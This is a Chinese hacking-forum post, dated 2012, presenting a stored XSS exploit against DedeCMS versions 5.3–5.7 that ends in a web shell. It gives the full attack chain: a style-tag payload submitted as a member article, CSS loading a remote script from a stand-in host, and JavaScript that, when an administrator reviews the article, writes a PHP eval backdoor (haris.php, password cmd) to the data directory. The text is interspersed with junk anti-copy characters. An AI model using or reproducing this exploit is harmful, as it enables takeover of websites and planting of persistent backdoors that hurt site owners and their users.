找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2463|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell2 H! h+ j" l% ^. B$ }2 P
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)$ I0 ]& d. M! z& n
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
1 s# v- V- i7 R3 j' k0 l* Y下面说说利用方法。
  P' W$ Q6 E8 K" C条件有2个:5 H  r6 o9 J, i# B* q8 L  Y! [9 o/ I, W
1.开启注册
! M6 e! S0 d6 R% f' S' {: S+ q( L4 d2.开启投稿
" \6 g( H3 P! |; n注册会员----发表文章* Z+ U' h3 Y5 _% ~1 n% Q
内容填写:
9 ]4 x, z% K9 f4 P复制代码
/ Z* i! Z& `( y$ ]* S, O<style>@im\port'\http://xxx.com/xss.css';</style>3 \8 x' r6 B2 O  t
新建XSS.Css
! p; G2 s' a  ~" H5 R9 G& Y复制代码
" g2 ~. |  e  _5 _.body{
2 ~" }- P4 h7 I" G$ e/ T' v2 G; ybackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
7 ]4 ~1 m* h1 ~新建xss.js 内容为" G5 V4 X& M8 j6 `
复制代码4 N9 _& t% V, k' Z  G' K
1.var request = false;: @  q4 Q  q6 u$ u. d  ^& r
2.if(window.XMLHttpRequest) {) R: M1 `9 g) V! [3 {8 _
3.request = new XMLHttpRequest();
8 D( z3 _0 q, C8 h2 ~6 R; q! j4.if(request.overrideMimeType) {4 l) j' n0 x1 I( M8 H
5.request.overrideMimeType('text/xml');5 d, {7 }+ [1 Y  M. n
6.}) [9 N) }: D3 K! @) @( o  w
7.} else if(window.ActiveXObject) {
0 T2 x) ?3 E/ b6 A8 N3 [7 L8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
7 \7 T) F6 W2 A1 s- a  n' {9 H9.for(var i=0; i<versions.length; i++) {; [' J) f1 I3 f
10.try {$ D+ e% q4 S2 j9 W- i
11.request = new ActiveXObject(versions);, M: W( U; B" ^" y3 r
12.} catch(e) {}
- t/ R7 U8 K( d9 H13.}( A) a" U" R+ J3 |) q+ f
14.}
5 _3 U! q* ]7 w15.xmlhttp=request;: I0 u2 v9 w: x6 u5 G; o
16.function getFolder( url ){
0 @; O0 p: m9 m3 v& V# W" x! W17. obj = url.split('/')- M5 p1 c* `2 f5 I( ~
18. return obj[obj.length-2]
! i) g" V5 C9 P5 K19.}3 |) a- J& e) {! v) f
20.oUrl = top.location.href;
( [; j% u# ~& S8 O# _; u4 w21.u = getFolder(oUrl);. ?8 S4 v. U8 h
22.add_admin();
/ z& F3 C# v& y23.function add_admin(){
, r- P( N% h% f( S24.var url= "/"+u+"/sys_sql_query.php";
" t$ N- U# v  g25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
" l+ z4 h! n$ A5 \$ P2 S26.xmlhttp.open("POST", url, true);
( a7 g7 o1 W9 n27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
' E! d1 C3 w6 B, h1 T9 M9 S( Z28.xmlhttp.setRequestHeader("Content-length", params.length);! f' I4 ?$ {5 g' f
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");( `- ^+ r- P4 k# ~
30.xmlhttp.send(params);' ^8 L# }# @& {
31.}" n; O. f7 _; |, F0 G- [0 |- E
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表